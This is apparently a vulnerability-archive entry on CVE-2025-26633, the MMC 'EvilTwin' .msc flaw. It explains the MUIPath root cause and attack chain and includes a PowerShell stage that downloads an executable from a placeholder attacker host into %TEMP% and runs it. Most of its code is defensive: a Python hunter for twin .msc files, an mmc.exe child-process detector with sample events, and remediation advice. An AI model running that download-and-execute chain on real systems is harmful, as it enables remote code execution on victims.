Windows MMC MSC EvilTwin - CVE-2025-26633
by sandsoncosta · 2026-05-17
- Severity: High
- CVE: CVE-2025-26633
- Category: binary
- Affected product: Microsoft Management Console (MMC), Windows
- Affected versions: Windows builds without the March 11, 2025 cumulative update
- Disclosed: 2025-03-11 (Microsoft security update; exploited in the wild before the fix)
- Patch status: patched
Archive entry: intelseclab/poc-archive
Metadata
| Field | Value |
|---|---|
| Date Added | 2026-05-17 |
| Last Updated | 2025-04-08 |
| Author / Researcher | sandsoncosta |
| CVE / Advisory | CVE-2025-26633 |
| Category | binary |
| Severity | High |
| CVSS Score | N/A |
| Status | Patched |
| Tags | RCE, Windows, MMC, MSC, ActiveX, EvilTwin, APT, EncryptHub, Water-Gamayun, zero-day, in-the-wild |
| Related | N/A |
Affected Target
| Field | Value |
|---|---|
| Software / System | Microsoft Management Console (MMC), Windows |
| Versions Affected | Windows versions prior to March 11, 2025 patch |
| Language / Platform | Windows, PowerShell, MSC (XML-based MMC snap-in) |
| Authentication Required | No |
| Network Access Required | No (local file delivery; social engineering required) |
Summary
CVE-2025-26633 is a vulnerability in Microsoft Management Console (MMC) that was exploited as a zero-day by Water Gamayun (also tracked as EncryptHub and Larva-208), a suspected Russian threat actor. The attack abuses MMC's MUIPath resolution: when a console (.msc) file is opened, MMC looks for a localized copy of that file in a language subfolder (such as `en-US`) and loads it in place of the file the user opened. The attacker ships a benign-looking .msc together with a same-named malicious twin in that subfolder; the twin embeds HTML/ActiveX content that MMC renders inside its own process, giving arbitrary command execution with no user interaction beyond opening the .msc. The campaign delivered the EncryptHub stealer and the DarkWisp and SilentPrism backdoors. Microsoft patched the flaw on March 11, 2025.
Vulnerability Details
Root Cause
The root cause is MMC's MUIPath resolution logic, which lets a console file be accompanied by localized copies in language subfolders. When MMC processes a .msc file it checks the MUI subfolder for a same-named file and prefers that one, and it renders the embedded HTML/ActiveX content of whatever file it ended up loading without adequate path validation or sandbox restrictions. An attacker therefore substitutes the expected localized resource with a crafted .msc carrying a malicious HTML/ActiveX payload while the victim only ever sees the benign file next to it: the "EvilTwin" technique.
Attack Vector
- The attacker crafts a benign-looking `.msc` file and places a same-named malicious `.msc` (the "evil twin") where MMC's MUIPath lookup will find it, in a language subfolder such as `en-US` beside the first file.
- The evil twin `.msc` contains embedded HTML with ActiveX controls (`WScript.Shell` or `Shell.Application`) that execute arbitrary commands.
- The victim is social-engineered into opening the benign-looking `.msc` (e.g., via email, download, or a UNC share).
- MMC loads the evil twin instead of the file the victim opened; the HTML/ActiveX payload runs in the MMC process context and executes arbitrary system commands.
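A hunting check for the file-system side of this chain, added here as an example (it is not part of the original PoC repository). It walks a directory tree looking for a `.msc` that has a same-named `.msc` in a MUI language subfolder of the same directory, which is exactly the layout MMC's MUIPath lookup needs, and then scans the twin's XML for HTML/ActiveX markers. The console files written by `build_sample_tree()` are constructed, minimal XML stand-ins for demonstration, not real MMC console files, and the marker list is an assumption about what never belongs in a legitimate string table.

```python
"""Hunt for the MSC EvilTwin file layout (added example, not the PoC's own code)."""
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Windows MUI language folder names: en-US, pt-BR, de-DE, zh-Hans ...
MUI_DIR = re.compile(r"^[a-z]{2,3}-[A-Za-z]{2,4}$")

# Assumed indicators: strings that do not belong in a console file's string table.
SCRIPT_MARKERS = ("<script", "ActiveXObject", "WScript.Shell",
                  "Shell.Application", "powershell", "mshta")


def find_twins(root):
    """Yield (original, twin) pairs: <dir>/<name>.msc with a <dir>/<lang>/<name>.msc beside it."""
    for dirpath, dirnames, filenames in os.walk(root):
        lang_dirs = [d for d in dirnames if MUI_DIR.match(d)]
        for name in filenames:
            if not name.lower().endswith(".msc"):
                continue
            for lang in lang_dirs:
                twin = os.path.join(dirpath, lang, name)
                if os.path.isfile(twin):
                    yield os.path.join(dirpath, name), twin


def script_markers(msc_path):
    """Return the set of SCRIPT_MARKERS found in any text node or attribute of the .msc XML."""
    try:
        tree = ET.parse(msc_path)
    except ET.ParseError:
        return {"unparseable-xml"}  # a console file that is not well-formed XML is itself odd
    found = set()
    for elem in tree.iter():
        for text in (elem.text, elem.tail, *elem.attrib.values()):
            if text:
                low = text.lower()
                found.update(m for m in SCRIPT_MARKERS if m.lower() in low)
    return found


def hunt(root):
    """Report every twin pair under root together with the markers found in the twin."""
    return [{"original": orig, "twin": twin, "markers": sorted(script_markers(twin))}
            for orig, twin in sorted(find_twins(root))]


# Constructed, minimal stand-in for a console file (the real schema is far larger).
BENIGN_MSC = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="Default">
  <StringTables>
    <StringTable ID="{00000000-0000-0000-0000-000000000000}">
      <Strings>
        <String ID="1" Refs="1">Console Root</String>
      </Strings>
    </StringTable>
  </StringTables>
</MMC_ConsoleFile>
"""

# The twin carries HTML/script in a string-table entry, XML-escaped as it would be on disk.
TWIN_MSC = BENIGN_MSC.replace(
    "Console Root",
    "&lt;script&gt;new ActiveXObject(&quot;WScript.Shell&quot;)&lt;/script&gt;")


def build_sample_tree():
    """Create <tmp>/console.msc with a malicious twin in <tmp>/en-US/ and
    <tmp>/clean.msc with a twin that carries no markers; return <tmp>."""
    root = tempfile.mkdtemp(prefix="msc-hunt-")
    os.mkdir(os.path.join(root, "en-US"))
    for name, twin_body in (("console.msc", TWIN_MSC), ("clean.msc", BENIGN_MSC)):
        with open(os.path.join(root, name), "w", encoding="utf-8") as f:
            f.write(BENIGN_MSC)
        with open(os.path.join(root, "en-US", name), "w", encoding="utf-8") as f:
            f.write(twin_body)
    return root


if __name__ == "__main__":
    for hit in hunt(build_sample_tree()):
        flag = "SUSPICIOUS" if hit["markers"] else "twin-only"
        print(f"{flag}: {hit['original']} -> {hit['twin']} markers={hit['markers']}")
```

Point `hunt()` at user-writable locations first (Downloads, Desktop, `%TEMP%`, mail attachment caches): a twin pair there is suspicious on its own, and a twin that also contains script markers is a strong indicator even before any process telemetry is examined.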
The PoC uses a multi-stage approach:
- Stage 1 (`stage1/dropper.ps1`): initial dropper/downloader
- Stage 2: intermediate payload delivery
- Stage 3 (`stage3/shell.ps1`): final payload execution (downloads and runs a C2 executable)
Impact
Arbitrary command execution in the context of the logged-in user via the MMC process. In-the-wild exploitation led to deployment of the EncryptHub information stealer and the DarkWisp and SilentPrism backdoors. If the victim has elevated privileges, full system compromise is possible.
Environment / Lab Setup
OS: Windows 10/11 (unpatched, prior to March 2025 cumulative update)
Target: Local Windows host with MMC available
Attacker: Host serving malicious .msc and stage payloads (HTTP server)
Tools: PowerShell, MMC (mmc.exe), HTTP server for payload hosting
Setup Steps
Proof of Concept
Step-by-Step Reproduction
Stage 1 - Dropper: deploy `stage1/dropper.ps1` on the attacker-controlled server; it downloads and executes the next stage.

```powershell
# Hosted at http://<attacker>/stage1/dropper.ps1
# Called by the malicious .msc ActiveX payload
```

Stage 2 - Payload Delivery: the crafted `.msc` (evil twin) contains HTML/ActiveX that calls `dropper.ps1` via `Shell.Application` or `WScript.Shell`.

Stage 3 - Shell: `stage3/shell.ps1` downloads the final C2 executable to `%TEMP%\c2.exe` and launches it.

```powershell
# stage3/shell.ps1: fetch the final stage into the user's temp directory and run it
$exePath = "$env:TEMP\c2.exe"
Invoke-WebRequest -Uri "http://<attacker>/shell.exe" -OutFile $exePath
Start-Process -FilePath $exePath
```
Exploit Code
See `stage1/dropper.ps1` and `stage3/shell.ps1` in this folder.
Expected Output
MMC loads malicious .msc, ActiveX executes PowerShell dropper chain,
final payload (c2.exe) runs in victim context.
Screenshots / Evidence
Detection & Indicators of Compromise
SIEM / IDS Rule (example, pseudo-syntax):

```
alert process mmc.exe spawning (powershell.exe OR pwsh.exe OR cmd.exe OR wscript.exe OR cscript.exe OR mshta.exe)
msg: "MMC spawned script interpreter - possible CVE-2025-26633 exploitation"
```

Tuning notes: mmc.exe rarely spawns a script interpreter on its own, so the base rule is low-noise, but administrators running consoles from System32 can trigger it; raise the severity when the parent command line shows a `.msc` loaded from a user-writable path (Downloads, `%TEMP%`, AppData, a UNC share) rather than `%SystemRoot%\System32`. On the file-system side, a `.msc` that has a same-named `.msc` in a MUI language subfolder (for example `en-US`) of a user-writable directory is the EvilTwin layout itself.
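The rule above, implemented over process-creation telemetry as an added example (this is not part of the original PoC or of any shipped SIEM rule). The records in `SAMPLE_EVENTS` are constructed Sysmon Event ID 1-style fields (`ParentImage`, `ParentCommandLine`, `Image`, `CommandLine`) and are not from a real host; the interpreter list and the "user-writable path" pattern are assumptions a deployment should tune.

```python
"""Detect mmc.exe spawning a script interpreter (added example, not the PoC's own code)."""
import re

# Assumed set of interpreters worth alerting on as children of mmc.exe.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}

# Where a mailed or downloaded .msc typically lives; built-in consoles live in System32.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(Downloads|Desktop|Documents|AppData)\\|\\Temp\\|\\ProgramData\\",
    re.IGNORECASE)
# First .msc argument on the parent command line, quoted or not.
MSC_ARG = re.compile(r'"?([^"\s]+\.msc)"?', re.IGNORECASE)


def image_name(path):
    """Basename of a Windows image path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return an alert dict when mmc.exe spawned an interpreter, else None."""
    if image_name(event.get("ParentImage", "")) != "mmc.exe":
        return None
    child = image_name(event.get("Image", ""))
    if child not in INTERPRETERS:
        return None
    m = MSC_ARG.search(event.get("ParentCommandLine", ""))
    msc = m.group(1) if m else None
    reasons = [f"mmc.exe spawned {child}"]
    severity = "medium"
    if msc and USER_WRITABLE.search(msc):
        severity = "high"  # console file came from a user-writable location
        reasons.append(f"console file loaded from user-writable path: {msc}")
    elif msc is None:
        reasons.append("mmc.exe started without a console file argument")
    return {"severity": severity, "child": child, "msc": msc,
            "child_cmdline": event.get("CommandLine", ""), "reasons": reasons,
            "msg": "MMC spawned script interpreter - possible CVE-2025-26633 exploitation"}


def run(events):
    """Apply evaluate() to every event and return the alerts in input order."""
    return [a for a in (evaluate(e) for e in events) if a]


# Constructed sample records; the first models the dropper chain described in this entry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\mmc.exe",
     "ParentCommandLine": r'"C:\Windows\System32\mmc.exe" "C:\Users\alice\Downloads\Invoice.msc"',
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -WindowStyle Hidden -File C:\Users\alice\AppData\Local\Temp\dropper.ps1"},
    {"ParentImage": r"C:\Windows\System32\mmc.exe",
     "ParentCommandLine": r'"C:\Windows\System32\mmc.exe" C:\Windows\System32\compmgmt.msc',
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c whoami"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe"},
    {"ParentImage": r"C:\Windows\System32\mmc.exe",
     "ParentCommandLine": r'"C:\Windows\System32\mmc.exe" C:\Windows\System32\eventvwr.msc',
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe"},
]

if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(f"[{alert['severity'].upper()}] {alert['msg']}: {'; '.join(alert['reasons'])}")
```

The path enrichment relies on `ParentCommandLine`, which Sysmon provides but Windows Security event 4688 does not (4688 carries only the parent process name); on 4688-only telemetry, join the child event to the parent's own 4688 record to recover the `.msc` argument. Note that with the EvilTwin layout the parent command line names the benign file, not the twin, so the file-system check remains the way to find the twin itself.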
Remediation
| Action | Detail |
|---|---|
| Patch | Apply the March 11, 2025 security update for the installed Windows build (the KB number differs per build); it is the only fix for the MUIPath loading behaviour |
| Workaround | AppLocker and WDAC do not filter `.msc` documents directly; deny `mmc.exe` to users who do not need administrative consoles (AppLocker executable rule), block `.msc` attachments at the email gateway, and treat `.msc` files arriving by mail, download, or UNC share as untrusted |
| Config Hardening | Restrict MMC snap-in use via Group Policy ("Restrict users to the explicitly permitted list of snap-ins"); monitor `mmc.exe` spawning child processes and `.msc` files loaded from user-writable paths |
References
- CVE-2025-26633
- Source Repository
- Researcher Blog Post (PT-BR): CVE-2025-26633 - Como simular e identificar o ataque MSC EvilTwin (How to simulate and detect the MSC EvilTwin attack)
- Trend Micro - Water Gamayun / EncryptHub
Notes
Multi-stage PoC repository with separate stage directories. The Stage 2 directory was present in the repo, but its file contents could not be retrieved due to API rate limiting at ingest time; only stage1/dropper.ps1 and stage3/shell.ps1 were saved. The actual malicious .msc file (evil twin) was not present as a standalone file in the repo root; the PoC demonstrates the chain via the PowerShell stages. Attributed to Water Gamayun (EncryptHub / Larva-208), a suspected Russian threat actor. MITRE ATT&CK coverage is given in the researcher's blog post.
Auto-ingested from https://github.com/sandsoncosta/CVE-2025-26633 on 2026-05-17.